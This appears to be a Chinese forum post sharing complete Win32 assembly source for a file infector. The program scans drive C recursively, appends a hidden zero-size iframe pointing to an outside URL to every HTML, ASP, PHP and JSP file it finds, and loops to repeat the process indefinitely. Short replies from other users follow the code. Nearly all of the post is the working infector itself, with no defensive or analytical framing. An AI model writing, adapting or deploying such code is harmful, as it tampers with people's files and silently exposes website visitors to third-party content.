感染C盘网页文件--win32汇编
;******************************************************;程序编写by netknight
;******************************************************
.386
.model flat, stdcall
option casemap :none
include windows.inc
include kernel32.inc
include user32.inc
include shlwapi.inc
includelib kernel32.lib
includelib user32.lib
includelib shlwapi.lib
include macros.inc
.data
szInjectURLAddr db '<iframe src=http://hi.baidu.com/netknight/ width=0 height=0></iframe>',0
szDriveString dd MAX_PATH dup(0)
pszExtension dd 50 dup(00h)
CRLF db 0Dh,0Ah,0
.code
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
InjectURLToFile proc _szFilePath,_szInjectURLAddr
local @szWriteBuf,@szReadBuf
local @hFile,@WriteBufLen,@dwBytesRead,@dwBytesWrite,@FileOffset
invoke RtlZeroMemory,addr @szWriteBuf,MAX_PATH
invoke RtlZeroMemory,addr @szReadBuf,MAX_PATH
invoke CreateFile,_szFilePath,GENERIC_WRITE OR GENERIC_READ,FILE_SHARE_READ,\
0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
.if eax !=INVALID_HANDLE_VALUE
mov @hFile,eax
.else
mov eax,FALSE
jmp @f
.endif
invoke lstrcat,addr CRLF,_szInjectURLAddr
invoke lstrcpy,addr @szWriteBuf,addr CRLF
invoke lstrlen,addr @szWriteBuf
mov @WriteBufLen,eax
not eax ;变为负数即是取反加一
inc eax
mov @FileOffset,eax
invoke SetFilePointer,@hFile,@FileOffset,NULL, FILE_END;从后读取
invoke ReadFile,@hFile,addr @szReadBuf,@WriteBufLen,addr @dwBytesRead,0
invoke MessageBox,NULL,addr @szReadBuf,addr @dwBytesRead,MB_APPLMODAL
invoke lstrcmp,addr @szReadBuf,addr @szWriteBuf
.if !eax
mov eax,FALSE
jmp @f
.endif
invoke SetFilePointer,@hFile,0,NULL, FILE_END
invoke WriteFile,@hFile,addr @szWriteBuf,@WriteBufLen,addr @dwBytesWrite,0
mov eax,TRUE
@@:
invoke CloseHandle,@hFile
ret
InjectURLToFile endp
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
_InfectWeb proc _szDriveString
local @finddata:WIN32_FIND_DATA
local FHandle
local @szFindDriver,@szFindPath,@szFilePath
invoke RtlZeroMemory,addr @szFindDriver,MAX_PATH
invoke RtlZeroMemory,addr @szFindPath,MAX_PATH
invoke RtlZeroMemory,addr @szFilePath,MAX_PATH
invoke lstrcpy,addr @szFindDriver,_szDriveString
invoke lstrcat,addr @szFindDriver,CTXT("\*.*")
invoke FindFirstFile,addr @szFindDriver,addr @finddata
.if eax!=INVALID_HANDLE_VALUE
mov FHandle,eax
.while eax!=0
invoke lstrcmp,addr @finddata.cFileName,CTXT(".")
.if !eax
jmp@f
.endif
invoke lstrcmp,addr @finddata.cFileName,CTXT("..")
.if !eax
jmp@f
.endif
.if @finddata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
invoke lstrcpy,addr @szFindPath,_szDriveString
invoke lstrcat,addr @szFindPath,CTXT("\")
invoke lstrcat,addr @szFindPath,addr @finddata.cFileName
invoke _InfectWeb,addr @szFindPath
.else
invoke Sleep,1
invoke lstrcpy,addr @szFilePath,_szDriveString
invoke lstrcat,addr @szFilePath,CTXT("\")
invoke lstrcat,addr @szFilePath,addr @finddata.cFileName
invoke PathFindExtension,addr @szFilePath
mov pszExtension,eax
invoke lstrcmpi,pszExtension,CTXT(".html")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".htm")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".asp")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".aspx")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".php")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".jsp")
cmp eax,0
jne @f
InfectWeb:
invoke InjectURLToFile,addr @szFilePath,addr szInjectURLAddr
invoke Sleep,10
.endif
@@:
invoke FindNextFile,FHandle,addr @finddata
.endw
invoke FindClose,FHandle
.endif
ret
_InfectWeb endp
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
start:
@@:
;invoke _InfectWeb,addr szDriveString
invoke _InfectWeb,CTXT("C:")
jmp @B
end start 这个代码比较简单,看懂了 没看懂,嘿嘿!!! 收藏下,呵呵
页:
[1]